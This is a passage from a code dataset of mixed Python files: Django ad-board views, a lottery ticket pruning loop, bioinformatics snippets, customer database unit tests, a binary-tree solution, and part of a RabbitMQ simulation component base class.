render_to_string\nfrom django.views.generic import DetailView, ListView, CreateView, UpdateView,\\\n DeleteView\n\nfrom django_filters.views import FilterView\n\nfrom .models import Ad, Reply, News\nfrom .filters import AdFilter\nfrom .tasks import send_mail\n\n\n# Create your views here.\n\nclass AdList(ListView):\n model = Ad\n template_name = \"ad_list.html\"\n context_object_name = 'ads'\n ordering = ['-creation_time']\n paginate_by = 30\n\n\nclass AdDetail(DetailView):\n model = Ad\n template_name = \"ad_detail.html\"\n context_object_name = 'ad'\n\n\nclass AdFiltered(LoginRequiredMixin, FilterView):\n filterset_class = AdFilter\n template_name = 'ad_filtered.html'\n context_object_name = 'ad_filtered'\n ordering = ['-creation_time']\n paginate_by = 5\n\n def get_queryset(self):\n queryset = Ad.objects.filter(user_id=self.request.user).values(\n 'user_id__email',\n 'category_id__name',\n 'header',\n 'ad',\n 'id',\n 'creation_time',\n 'reply__user_id__email',\n 'reply__reply',\n 'reply__creation_time',\n 'reply__is_approved',\n 'reply__id',\n )\n return queryset\n\n\nclass AdCreate(LoginRequiredMixin, CreateView):\n model = Ad\n fields = ['category_id', 'header', 'ad']\n template_name = 'ad_create.html'\n context_object_name = 'ad_create'\n\n def get_success_url(self):\n self.success_url = reverse('ad_list_view')\n return super().get_success_url()\n\n def form_valid(self, form):\n form.instance.user_id = self.request.user\n return super().form_valid(form)\n\n\nclass AdEdit(LoginRequiredMixin, UpdateView):\n model = Ad\n fields = ['category_id', 'header', 'ad']\n template_name = 'ad_create.html'\n context_object_name = 'ad_create'\n\n def get_success_url(self):\n self.success_url = reverse('ad_list_view')\n return super().get_success_url()\n\n\nclass AdDelete(LoginRequiredMixin, DeleteView):\n model = Ad\n template_name = 'ad_delete.html'\n context_object_name = 'ad_delete'\n\n def get_success_url(self):\n self.success_url = reverse('ad_list_view')\n return super().get_success_url()\n\n\nclass ReplyList(LoginRequiredMixin, ListView):\n template_name = 'reply_list.html'\n context_object_name = 'reply_list'\n paginate_by = 30\n\n def get_queryset(self):\n queryset = Reply.objects.\\\n filter(user_id=self.request.user).order_by('-creation_time')\n return queryset\n\n\nclass ReplyConfirmApprove(LoginRequiredMixin, DetailView):\n model = Reply\n template_name = 
\"reply_approve.html\"\n context_object_name = 'reply'\n\n\n@login_required\ndef approve_reply(request, pk):\n reply = Reply.objects.get(id=pk)\n if request.user.id == reply.ad_id.user_id.id:\n reply.is_approved = True\n reply.save()\n\n return redirect(reverse('ad_filtered_view'))\n\n\nclass ReplyCreate(LoginRequiredMixin, CreateView):\n model = Reply\n template_name = 'reply_create.html'\n fields = ['reply']\n context_object_name = 'reply_create'\n\n def get_success_url(self):\n self.success_url = reverse('ad_list_view')\n return super().get_success_url()\n\n def form_valid(self, form):\n form.instance.user_id = self.request.user\n form.instance.ad_id = Ad.objects.get(id=self.kwargs['ad_id'])\n return super().form_valid(form)\n\n\nclass ReplyDelete(LoginRequiredMixin, DeleteView):\n model = Reply\n template_name = 'reply_delete.html'\n context_object_name = 'reply_delete'\n\n def get_success_url(self):\n self.success_url = reverse('ad_filtered_view')\n return super().get_success_url()\n\n\nclass NewsList(ListView):\n model = News\n template_name = 'news_list.html'\n context_object_name = 'news_list'\n ordering = ['-creation_time']\n paginate_by = 20\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['in_mailing_list'] = self.request.user.groups.filter(\n name='mailing_list'\n ).exists()\n return context\n\n\nclass NewsDetail(DetailView):\n model = News\n template_name = 'news_detail.html'\n context_object_name = 'news'\n\n\nclass NewsMailingConfirm(LoginRequiredMixin, PermissionRequiredMixin,\n DetailView):\n model = News\n template_name = 'news_confirm_mailing.html'\n context_object_name = 'news'\n permission_required = ('board.create_news',)\n\n\n@permission_required('board.create_news')\ndef news_mailing_confirm(reqest, pk):\n site = 'https://{domain}'.format(\n domain=Site.objects.get_current().domain,\n )\n\n url = '{domain}{path}'.format(\n domain=site,\n path=reverse('news_detail_view', args=[pk]),\n )\n\n mailing_news = News.objects.get(id=pk)\n mailing_users = get_user_model().objects.filter(\n groups__name='mailing_list',\n )\n\n for user in mailing_users:\n user_email = user.email\n html_content = render_to_string(\n 'email/mail_mailing_news.html',\n {\n 'news': mailing_news,\n 'site': site,\n 'url': url,\n 'user': user_email,\n }\n )\n txt_content = render_to_string(\n 'email/mail_mailing_news.txt',\n {\n 'news': mailing_news,\n 'site': site,\n 'url': url,\n 'user': user_email,\n }\n )\n subject = render_to_string(\n 'email/subject_mailing_news.txt',\n {\n 'site': site,\n 'news': mailing_news,\n }\n )\n mail_to = [user_email]\n\n send_mail.delay(mail_to, subject, txt_content, html_content)\n return redirect(reverse('news_list_view'))\n\n\nclass NewsCreate(LoginRequiredMixin, PermissionRequiredMixin, CreateView):\n model = News\n fields = ['header', 'news']\n template_name = 'news_create.html'\n context_object_name = 'news_create'\n permission_required = ('board.create_news',)\n\n def get_success_url(self):\n self.success_url = reverse('news_list_view')\n return super().get_success_url()\n\n def form_valid(self, form):\n form.instance.user_id = self.request.user\n return super().form_valid(form)\n\n\nclass NewsEdit(LoginRequiredMixin, PermissionRequiredMixin, UpdateView):\n model = News\n fields = ['header', 'news']\n template_name = 'news_create.html'\n context_object_name = 'news_create'\n permission_required = ('board.change_news',)\n\n def get_success_url(self):\n self.success_url = reverse('news_list_view')\n return 
super().get_success_url()\n\n\nclass NewsDelete(LoginRequiredMixin, PermissionRequiredMixin, DeleteView):\n model = News\n template_name = 'news_delete.html'\n context_object_name = 'news_delete'\n permission_required = ('board.delete_news',)\n\n def get_success_url(self):\n self.success_url = reverse('news_list_view')\n return super().get_success_url()\n\n\n@login_required\ndef news_subscribe(request):\n group, created = Group.objects.get_or_create(name='mailing_list')\n group.user_set.add(request.user)\n\n return redirect(reverse('news_list_view'))\n\n\n@login_required\ndef news_unsubscribe(request):\n group, created = Group.objects.get_or_create(name='mailing_list')\n group.user_set.remove(request.user)\n\n return redirect(reverse('news_list_view'))\n","sub_path":"portal/board/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"231453215","text":"# Copyright (C) 2018 Google Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Run the lottery ticket experiment.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\n\n\ndef run_experiment(experiment, max_prune_iterations, presets=None):\n \"\"\"Run the lottery ticket experiment for the specified number of iterations.\n\n Args:\n experiment: an object implementing ExperimentBase\n max_num_prunes: The number of pruning iterations to perform.\n presets: (optional) The presets to use for the first iteration of training.\n In the form of a dictionary where each key is the name of a tensor and\n each value is a numpy array of the values to which that tensor should\n be initialized.\n \"\"\"\n # Run once normally.\n initial, final_weights, train_acc = experiment.train_once(0, presets=presets)\n\n # Create the initial masks with no weights pruned.\n masks = {}\n for k, v in initial.items():\n masks[k] = np.ones(v.shape)\n\n # Begin the training loop.\n for iteration in range(1, max_prune_iterations + 1):\n if experiment.stop_pruning(train_acc):\n break\n\n # Prune the network.\n masks = experiment.prune_masks(masks, final_weights)\n\n # Train the network again.\n _, final_weights, train_acc = experiment.train_once(iteration, presets=initial, masks=masks)\n","sub_path":"lottery_ticket/foundations/experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"195371436","text":"# 1\nA, T, C, G = 0, 0, 0, 0\n# print(A)\n\n# 2\nwith open('rosalind_dna.txt','r') as open_file:\n\tline = open_file.readline()\n\n# 2a\nwith open('rosalind_iprb.txt', 'r') as infile:\n (k, m, n) = (int(value) for value in infile.readline().split())\n\n# 3\nresult = line.replace('A','t').replace('T','a').replace('G','c').replace('C','g').upper()[::-1]\n\n# 4 \npercent = round(cg*100/strlen,6)\n\n#5 \nwith open('file.txt','r') as 
f:\n\tstrands = [x.strip() for x in f.readlines()]\n\n#6 - parces multiline FASTA-format input into a dictionary\ntemp_key = ''\ninputdata = {}\nwith open('rosalind_gc.txt','r') as f:\n\tline = f.readline().strip()\n\twhile line:\n\t\tif line[:1]=='>':\n\t\t\ttemp_key = line[1:]\n\t\telse:\n\t\t\tif temp_key not in inputdata.keys():\n\t\t\t\tinputdata[temp_key] = ''\n\t\t\tinputdata[temp_key]+=line\n\t\tline = f.readline().strip()","sub_path":"rosalind.info/2remember.py","file_name":"2remember.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"41587424","text":"'''\nUnit tests\n'''\n\n# pylint: disable=W\n# pylint: disable=R0201\n\nimport logging\nfrom unittest import TestCase\nimport peewee\nfrom customers_model import *\nfrom basic_operations import *\n\nlogging.basicConfig(level=logging.INFO)\nLOGGER = logging.getLogger(__name__)\n\nclass TestBasicOperations(TestCase):\n '''Test all Database functions'''\n def setUp(self):\n '''Create the tables'''\n database.create_tables([Customers])\n LOGGER.info('Create table successful')\n\n def tearDown(self):\n '''Delete the tables'''\n database.drop_tables([Customers])\n LOGGER.info('Database tables dropped')\n\n def test_add_customer(self):\n '''test add a customer to the database'''\n test_customer = {\n 'customer_id': '12345',\n 'name': 'Eric Grandeo',\n 'lastname': 'Grandeo',\n 'home_address': '123 Fake Street',\n 'phone_number': '1-212-555-1234',\n 'email_address': 'email@email.com',\n 'status': True,\n 'credit_limit': 25000\n }\n add_customer(**test_customer)\n record = Customers.get(Customers.customer_id == test_customer['customer_id'])\n LOGGER.info(\"New customer: {}\".format(record.name))\n self.assertEqual(record.customer_id, test_customer['customer_id'])\n\n def test_search_customer(self):\n '''test searching for a customer by ID'''\n test_customer = {\n 'customer_id': '12345',\n 'name': 'Eric Grandeo',\n 'lastname': 'Grandeo',\n 'home_address': '123 Fake Street',\n 'phone_number': '1-212-555-1234',\n 'email_address': 'email@email.com',\n 'status': True,\n 'credit_limit': 25000\n }\n\n add_customer(**test_customer)\n customer_record = {'name':'Eric Grandeo', 'lastname':'Grandeo',\n 'email_address':'email@email.com',\n 'phone_number':'1-212-555-1234'}\n result = search_customer('12345')\n self.assertEqual(result, customer_record)\n\n\n def test_search_customer_fail(self):\n '''test a failed search, user does not exist'''\n test_customer = {\n 'customer_id': '12345',\n 'name': 'Eric Grandeo',\n 'lastname': 'Grandeo',\n 'home_address': '123 Fake Street',\n 'phone_number': '1-212-555-1234',\n 'email_address': 'email@email.com',\n 'status': True,\n 'credit_limit': 25000\n }\n\n add_customer(**test_customer)\n fail_customer = {}\n result = search_customer('12346')\n self.assertEqual(result, fail_customer)\n\n def test_delete_customer(self):\n '''test deleting a customer'''\n test_customer = {\n 'customer_id': '12345',\n 'name': 'Eric Grandeo',\n 'lastname': 'Grandeo',\n 'home_address': '123 Fake Street',\n 'phone_number': '1-212-555-1234',\n 'email_address': 'email@email.com',\n 'status': True,\n 'credit_limit': 25000\n }\n add_customer(**test_customer)\n self.assertEqual(delete_customer(test_customer['customer_id']), None)\n\n def test_delete_customer_fail(self):\n '''test deleting a customer that does not exist'''\n with self.assertRaises(ValueError):\n delete_customer('2468')\n\n def test_update_customer_credit(self):\n '''test updating a 
users credit limit by id'''\n test_customer = {\n 'customer_id': '12345',\n 'name': 'Eric Grandeo',\n 'lastname': 'Grandeo',\n 'home_address': '123 Fake Street',\n 'phone_number': '1-212-555-1234',\n 'email_address': 'email@email.com',\n 'status': True,\n 'credit_limit': 25000\n }\n add_customer(**test_customer)\n update_customer_credit(test_customer['customer_id'], 100000)\n get_customer = Customers.get(Customers.customer_id == test_customer['customer_id'])\n LOGGER.info(\"New credit limit: {}\".format(get_customer.credit_limit))\n self.assertEqual(get_customer.credit_limit, 100000)\n\n\n def test_update_customer_credit_fail(self):\n '''test updating the credit limit of a user that does not exist'''\n test_customer = {\n 'customer_id': '12345',\n 'name': 'Eric Grandeo',\n 'lastname': 'Grandeo',\n 'home_address': '123 Fake Street',\n 'phone_number': '1-212-555-1234',\n 'email_address': 'email@email.com',\n 'status': True,\n 'credit_limit': 25000\n }\n add_customer(**test_customer)\n with self.assertRaises(ValueError):\n update_customer_credit('2468', 100000)\n\n def test_list_active_customers(self):\n '''test getting the number of active customers where active == True'''\n test_customer_1 = {\n 'customer_id': '12345',\n 'name': 'Eric Grandeo',\n 'lastname': 'Grandeo',\n 'home_address': '123 Fake Street',\n 'phone_number': '1-212-555-1234',\n 'email_address': 'email@email.com',\n 'status': True,\n 'credit_limit': 25000\n }\n test_customer_2 = {\n 'customer_id': '45678',\n 'name': 'Jack Grandeo',\n 'lastname': 'Grandeo',\n 'home_address': '123 Fake Street',\n 'phone_number': '1-212-555-1234',\n 'email_address': 'email@email.com',\n 'status': False,\n 'credit_limit': 25000\n }\n test_customer_3 = {\n 'customer_id': '54321',\n 'name': 'Vivie Grandeo',\n 'lastname': 'Grandeo',\n 'home_address': '123 Fake Street',\n 'phone_number': '1-212-555-1234',\n 'email_address': 'email@email.com',\n 'status': True,\n 'credit_limit': 25000\n }\n add_customer(**test_customer_1)\n add_customer(**test_customer_2)\n add_customer(**test_customer_3)\n return_active_customers()\n self.assertEqual(list_active_customers(), 2)\n\n def test_add_multiple_customers(self):\n 'test adding multiple customers'\n test_customers = [{\n 'customer_id': '54321',\n 'name': 'Eric Grandeo',\n 'lastname': 'Grandeo',\n 'home_address': '123 Fake Street',\n 'phone_number': '1-212-555-1234',\n 'email_address': 'email@email.com',\n 'status': True,\n 'credit_limit': 25000\n },\n {\n 'customer_id': '98765',\n 'name': 'Jack Charles',\n 'lastname': 'Charles',\n 'home_address': '123 Fake Street',\n 'phone_number': '1-212-555-1234',\n 'email_address': 'email@email.com',\n 'status': False,\n 'credit_limit': 25000\n }\n , {\n 'customer_id': '10846',\n 'name': 'Vivie Harper',\n 'lastname': 'Harper',\n 'home_address': '123 Fake Street',\n 'phone_number': '1-212-555-1234',\n 'email_address': 'email@email.com',\n 'status': True,\n 'credit_limit': 25000\n }]\n add_multiple_customers(test_customers)\n #customer_list = return_all_customers()\n #for customer in customer_list:\n # print(customer)\n print_all_customers()\n ","sub_path":"students/eric_grandeo/lesson04/unit_test.py","file_name":"unit_test.py","file_ext":"py","file_size_in_byte":7812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"559561622","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n ansList =[]\n 
def __init__(self):\n self.ansList = []\n def binaryTreePaths(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[str]\n \"\"\"\n self.dfs(root,\"\")\n return self.ansList\n def dfs(self,root,curPath):\n\n#by using pass by value way, we don't need to append and pop out the current path\n#the last node does not has the \"->\" sign, hence the last one is a number for sure\n#when there is more to go, either left or right, we need to add \"->\" in the end\n if root == None:\n return\n if root.left == None and root.right == None:\n self.ansList.append(curPath + str(root.val))\n if root.left != None:\n self.dfs(root.left,curPath + str(root.val) + \"->\")\n if root.right != None:\n self.dfs(root.right,curPath + str(root.val) + \"->\")\n return\n \n ","sub_path":"257.py","file_name":"257.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"332295361","text":"# -*- coding: utf-8 -*-\n# Copyright 2021 Tampere University and VTT Technical Research Centre of Finland\n# This software was developed as a part of the ProCemPlus project: https://www.senecc.fi/projects/procemplus\n# This source code is licensed under the MIT license. See LICENSE in the repository root directory.\n# Author(s): Ville Heikkilä \n# Otto Hylli \n\n\"\"\"This module contains a base simulation component that can communicate with the RabbitMQ message bus.\"\"\"\n\nimport asyncio\nimport json\nfrom typing import cast, Any, Dict, List, Optional, Union\n\nfrom tools.clients import RabbitmqClient\nfrom tools.exceptions.messages import MessageError\nfrom tools.messages import (\n BaseMessage, AbstractMessage, EpochMessage, StatusMessage, SimulationStateMessage, MessageGenerator)\nfrom tools.tools import FullLogger, EnvironmentVariable\n\nLOGGER = FullLogger(__name__)\n\n# The names of the environmental variables used by the component.\nSIMULATION_ID = \"SIMULATION_ID\"\nSIMULATION_COMPONENT_NAME = \"SIMULATION_COMPONENT_NAME\"\nSIMULATION_EPOCH_MESSAGE_TOPIC = \"SIMULATION_EPOCH_MESSAGE_TOPIC\"\nSIMULATION_STATUS_MESSAGE_TOPIC = \"SIMULATION_STATUS_MESSAGE_TOPIC\"\nSIMULATION_STATE_MESSAGE_TOPIC = \"SIMULATION_STATE_MESSAGE_TOPIC\"\nSIMULATION_ERROR_MESSAGE_TOPIC = \"SIMULATION_ERROR_MESSAGE_TOPIC\"\nSIMULATION_START_MESSAGE_FILENAME = \"SIMULATION_START_MESSAGE_FILENAME\"\n\n# To receive any other messages other than \"Epoch\" and \"SimState\" from the message bus\n# use a comma separated list in SIMULATION_OTHER_TOPICS\n# for example: \"Result,Info\" would make the simulation component listen to topics\n# \"Result\" and \"Info\" in addition to the topics \"Epoch\" and \"SimState\nSIMULATION_OTHER_TOPICS = \"SIMULATION_OTHER_TOPICS\"\n\n\nclass AbstractSimulationComponent:\n \"\"\"Class for holding the state of a abstract simulation component.\n The actual simulation components should be derived from this.\"\"\"\n SIMULATION_STATE_VALUE_RUNNING = SimulationStateMessage.SIMULATION_STATES[0] # \"running\"\n SIMULATION_STATE_VALUE_STOPPED = SimulationStateMessage.SIMULATION_STATES[-1] # \"stopped\"\n\n READY_STATUS = StatusMessage.STATUS_VALUES[0] # \"ready\"\n ERROR_STATUS = StatusMessage.STATUS_VALUES[-1] # \"error\"\n\n def __init__(self,\n simulation_id: Optional[str] = None,\n component_name: Optional[str] = None,\n epoch_message_topic: Optional[str] = None,\n simulation_state_message_topic: Optional[str] = None,\n status_message_topic: Optional[str] = None,\n error_message_topic: Optional[str] = None,\n other_topics: 
Optional[List[str]] = None,\n rabbitmq_host: Optional[str] = None,\n rabbitmq_port: Optional[int] = None,\n rabbitmq_login: Optional[str] = None,\n rabbitmq_password: Optional[str] = None,\n rabbitmq_ssl: Optional[bool] = None,\n rabbitmq_ssl_version: Optional[str] = None,\n rabbitmq_exchange: Optional[str] = None,\n rabbitmq_exchange_autodelete: Optional[bool] = None,\n rabbitmq_exchange_durable: Optional[bool] = None,\n **kwargs: Any):\n \"\"\"Loads the simulation is and the component name as wells as the required topic names from environmental\n variables and sets up the connection to the RabbitMQ message bus for which the connection parameters are\n fetched from environmental variables. Opens a topic listener for the simulation state and epoch messages\n as well as other specified topics after creating the connection to the message bus.\n\n If any attribute is missing or its value is None, an environmental value is used for the attribute value.\n Most attributes also have a default value that is used when even the environmental value is missing.\n\n The available attributes:\n - simulation_id (str)\n - the simulation_id for the simulation, i.e. SimulationId that is used in the messages\n - environmental variable: \"SIMULATION_ID\"\n - default value: \"2020-01-01T00:00:00.000Z\"\n - component_name (str)\n - the component name, i.e. the SourceProcessId, that the component uses in the messages\n - environmental variable: \"SIMULATION_COMPONENT_NAME\"\n - default value: \"component\"\n - epoch_message_topic (str)\n - the topic name for the Epoch messages\n - environmental variable: \"SIMULATION_EPOCH_MESSAGE_TOPIC\"\n - default value: \"Epoch\"\n - simulation_state_message_topic (str)\n - the topic name for the Simulation state messages\n - environmental variable: \"SIMULATION_STATE_MESSAGE_TOPIC\"\n - default value: \"SimState\"\n - status_message_topic (str)\n - the topic name for the Status ready messages\n - environmental variable: \"SIMULATION_STATUS_MESSAGE_TOPIC\"\n - default value: \"Status.Ready\"\n - error_message_topic (str)\n - the topic name for the Status error messages\n - environmental variable: \"SIMULATION_ERROR_MESSAGE_TOPIC\"\n - default value: \"Status.Error\"\n - other_topics (List[str])\n - a list of topic names that the component needs to listen to in addition to the epoch and simulation state\n - environmental variable: \"SIMULATION_OTHER_TOPICS\"\n - in the environmental variable the list is given as a comma seprated string, e.g. 
\"Result,Info\"\n - default value: []\n - rabbitmq_host (str)\n - the host name for the RabbitMQ server\n - environmental variable: \"RABBITMQ_HOST\"\n - default value: \"localhost\"\n - rabbitmq_port (int)\n - the port number for the RabbitMQ server\n - environmental variable: \"RABBITMQ_PORT\"\n - default value: 5672\n - rabbitmq_login (str)\n - the username for access to the RabbitMQ server\n - environmental variable: \"RABBITMQ_LOGIN\"\n - default value: \"\"\n - rabbitmq_password (str)\n - the password for access to the RabbitMQ server\n - environmental variable: \"RABBITMQ_PASSWORD\"\n - default value: \"\"\n - rabbitmq_ssl (bool)\n - whether to use SSL connection to the RabbitMQ server\n - environmental variable: \"RABBITMQ_SSL\"\n - default value: False\n - rabbitmq_ssl_version (str)\n - the SSL version parameter for the SSL connection (ignored if rabbitmq_ssl is False)\n - environmental variable: \"RABBITMQ_SSL_VERSION\"\n - default value: \"PROTOCOL_TLS\"\n - rabbitmq_exchange (str)\n - the name for the exchange used by the RabbitMQ client\n - environmental variable: \"RABBITMQ_EXCHANGE\"\n - default value: \"\"\n - rabbitmq_exchange_autodelete (bool)\n - whether to automatically delete the exchange after use\n - environmental variable: \"RABBITMQ_EXCHANGE_AUTODELETE\"\n - default value: False\n - rabbitmq_exchange_durable (bool)\n - whether to setup the exchange to survive message bus restarts\n - environmental variable: \"RABBITMQ_EXCHANGE_DURABLE\"\n - default value: False\n - **kwargs\n - all other arguments are ignored\n \"\"\"\n # pylint: disable=unused-argument\n\n # Start the connection to the RabbitMQ client using the given connection parameters and\n # the environmental values for those parameters that were not given.\n self._rabbitmq_parameters = AbstractSimulationComponent.__get_rabbitmq_parameters(\n host=rabbitmq_host,\n port=rabbitmq_port,\n login=rabbitmq_login,\n password=rabbitmq_password,\n ssl=rabbitmq_ssl,\n ssl_version=rabbitmq_ssl_version,\n exchange=rabbitmq_exchange,\n exchange_autodelete=rabbitmq_exchange_autodelete,\n exchange_durable=rabbitmq_exchange_durable\n )\n self._rabbitmq_client = RabbitmqClient(**self._rabbitmq_parameters)\n\n # set the component variables for which the values can also be received from the environmental variables\n self.__set_component_variables(\n simulation_id=simulation_id,\n component_name=component_name,\n epoch_message_topic=epoch_message_topic,\n simulation_state_message_topic=simulation_state_message_topic,\n status_message_topic=status_message_topic,\n error_message_topic=error_message_topic,\n other_topics=other_topics\n )\n\n self.__start_message = self.__load_start_message()\n\n self._is_stopped = True\n self.initialization_error = None\n # component goes to error state after it has sent an error message\n # in an error state the component only reacts to simulation state message \"stopped\" by stopping and\n # to epoch message and simulation state message \"running\" by sending an error message.\n # Note: for errors during initialization, the self.initialization_error variable should be used\n self._in_error_state = False\n self._error_description = \"\"\n\n self._simulation_state = AbstractSimulationComponent.SIMULATION_STATE_VALUE_STOPPED\n self._latest_epoch = 0\n self._completed_epoch = 0\n self._triggering_message_ids = [\"\"]\n self._latest_status_message_id = None\n self._latest_epoch_message = None\n\n self._message_generator = MessageGenerator(self._simulation_id, self._component_name)\n # include the 
message id generator separately to be compatible with older code created before\n # the message generator class was implemented\n self._message_id_generator = self._message_generator.message_id_generator\n\n # lock that is set while the component is handling a message\n self._lock = asyncio.Lock()\n\n @property\n def simulation_id(self) -> str:\n \"\"\"The simulation ID for the simulation.\"\"\"\n return self._simulation_id\n\n @property\n def component_name(self) -> str:\n \"\"\"The component name in the simulation.\"\"\"\n return self._component_name\n\n @property\n def is_stopped(self) -> bool:\n \"\"\"Returns True, if the component is stopped.\"\"\"\n return self._is_stopped\n\n @property\n def is_client_closed(self) -> bool:\n \"\"\"Returns True if the RabbitMQ client has been stopped.\"\"\"\n return self._rabbitmq_client is None or self._rabbitmq_client.is_closed\n\n @property\n def initialization_error(self) -> Union[str, None]:\n \"\"\"If the component has encountered an error during initialization, contains an error message.\n If there was no error, will be None.\"\"\"\n return self._initialization_error\n\n @initialization_error.setter\n def initialization_error(self, initialization_error: Union[str, None]):\n \"\"\"Set the initialization error message.\"\"\"\n self._initialization_error = initialization_error\n\n @property\n def start_message(self) -> Optional[Dict[str, Any]]:\n \"\"\"The JSON formatted Start message as Python dictionary.\n The Start message is set to None if the Start message is not available.\"\"\"\n return self.__start_message\n\n async def start(self) -> None:\n \"\"\"Starts the component.\"\"\"\n if self.initialization_error is not None or self._in_error_state:\n if self.initialization_error is not None:\n LOGGER.error(\"Component has an initialization error: {}\".format(self.initialization_error))\n else:\n LOGGER.error(\"Component is in an error state: {}\".format(self._error_description))\n LOGGER.warning(\"The component will be started to allow the others to know about the error.\")\n\n if self.is_client_closed:\n self._rabbitmq_client = RabbitmqClient(**self._rabbitmq_parameters)\n\n LOGGER.info(\"Starting the component: '{}'\".format(self.component_name))\n topics_to_listen = self._other_topics + [\n self._simulation_state_topic,\n self._epoch_topic\n ]\n self._rabbitmq_client.add_listener(topics_to_listen, self.general_message_handler_base)\n self._is_stopped = False\n\n async def stop(self) -> None:\n \"\"\"Stops the component.\"\"\"\n LOGGER.info(\"Stopping the component: '{}'\".format(self.component_name))\n self._simulation_state = AbstractSimulationComponent.SIMULATION_STATE_VALUE_STOPPED\n await self._rabbitmq_client.close()\n self._is_stopped = True\n\n def get_simulation_state(self) -> str:\n \"\"\"Returns the simulation state attribute.\"\"\"\n return self._simulation_state\n\n async def set_simulation_state(self, new_simulation_state: str) -> None:\n \"\"\"Sets the simulation state. If the new simulation state is \"running\" and the current epoch is 0,\n sends a status message to the message bus. 
If initialization_error is None, sends a ready status message.\n If it contains an error message, sends an error status.\n If the new simulation state is \"stopped\", stops the component.\"\"\"\n if new_simulation_state in SimulationStateMessage.SIMULATION_STATES:\n self._simulation_state = new_simulation_state\n\n if new_simulation_state == AbstractSimulationComponent.SIMULATION_STATE_VALUE_RUNNING:\n if self._latest_epoch == 0:\n if self.initialization_error is None:\n if not self._in_error_state:\n # normal situation\n await self.send_status_message()\n else:\n # component is in an error state\n await self.send_error_message(self._error_description)\n else:\n # the component could not be initialized properly\n await self.send_error_message(self.initialization_error)\n\n elif new_simulation_state == AbstractSimulationComponent.SIMULATION_STATE_VALUE_STOPPED:\n await self.stop()\n\n def clear_epoch_variables(self) -> None:\n \"\"\"Clears all the variables that are used to store information about the received input within the\n current epoch. This method is called automatically after receiving an epoch message for a new epoch.\n\n NOTE: this method should be overwritten in any child class that uses epoch specific variables\n \"\"\"\n\n async def start_epoch(self) -> bool:\n \"\"\"Starts a new epoch for the component.\n Returns True if the epoch calculations were completed for the current epoch.\n \"\"\"\n if self._simulation_state == AbstractSimulationComponent.SIMULATION_STATE_VALUE_STOPPED:\n LOGGER.warning(\"Simulation is stopped, cannot start epoch calculations\")\n return False\n\n if self._latest_epoch_message is None:\n LOGGER.warning(\"No epoch message received, cannot start epoch calculations.\")\n return False\n\n if self._simulation_state != AbstractSimulationComponent.SIMULATION_STATE_VALUE_RUNNING:\n LOGGER.warning(\"Simulation in an unknown state: '{}', cannot start epoch calculations.\".format(\n self._simulation_state))\n return False\n\n self._latest_epoch = self._latest_epoch_message.epoch_number\n\n if self._in_error_state:\n # Component is in an error state and instead of starting a new epoch will just send an error message.\n LOGGER.error(\"Component is in an error state: {}\".format(self._error_description))\n await self.send_error_message(self._error_description)\n return True\n\n if self._completed_epoch == self._latest_epoch:\n LOGGER.warning(\"The epoch {} has already been processed.\".format(self._completed_epoch))\n LOGGER.debug(\"Resending status message for epoch {}\".format(self._latest_epoch))\n await self.send_status_message()\n return True\n\n if await self.ready_for_new_epoch():\n if await self.process_epoch():\n # The current epoch was successfully processed.\n self._completed_epoch = self._latest_epoch\n await self.send_status_message()\n LOGGER.info(\"Finished processing epoch {}\".format(self._completed_epoch))\n return True\n\n # Some information required for the epoch is still missing.\n return False\n\n async def process_epoch(self) -> bool:\n \"\"\"Process the epoch and do all the required calculations.\n Assumes that all the required information for processing the epoch is available.\n\n Returns False, if processing the current epoch was not yet possible.\n Otherwise, returns True, which indicates that the epoch processing was fully completed.\n This also indicates that the component is ready to send a Status Ready message to the Simulation Manager.\n\n NOTE: this method should be overwritten in any child class.\n \"\"\"\n # Any calculations 
done within the current epoch would be included here.\n # Also sending of any result messages (other than Status message) would be included here.\n return True\n\n async def ready_for_new_epoch(self) -> bool:\n \"\"\"Returns True, if all the messages required to start the processing for the current epoch are available.\n \"\"\"\n if (self._simulation_state == AbstractSimulationComponent.SIMULATION_STATE_VALUE_RUNNING and\n not self.is_stopped and\n self._completed_epoch < self._latest_epoch):\n return await self.all_messages_received_for_epoch()\n\n # Some preconditions for the epoch processing were not fulfilled.\n return False\n\n async def all_messages_received_for_epoch(self) -> bool:\n \"\"\"Returns True, if all the messages required to start calculations for the current epoch have been received.\n Checks only that all the required information is available.\n Does not check any other conditions like the simulation state.\n\n NOTE: this method should be overwritten in any child class that needs more information\n than just the Epoch message.\n \"\"\"\n # The AbstractSimulationComponent needs no information other than the Epoch message for processing.\n return True\n\n async def general_message_handler_base(self, message_object: Union[BaseMessage, Any],\n message_routing_key: str) -> None:\n \"\"\"Forwards the message handling to the appropriate function depending on the message type.\"\"\"\n # only allow handling one message at a time\n async with self._lock:\n if isinstance(message_object, SimulationStateMessage):\n await self.simulation_state_message_handler(message_object, message_routing_key)\n\n elif isinstance(message_object, EpochMessage):\n await self.epoch_message_handler(message_object, message_routing_key)\n\n elif self._in_error_state:\n # component is in an error state and will not react to any other messages\n return\n\n else:\n # Handling of any other message types would be added to a separate function.\n await self.general_message_handler(message_object, message_routing_key)\n\n async def general_message_handler(self, message_object: Union[BaseMessage, Any],\n message_routing_key: str) 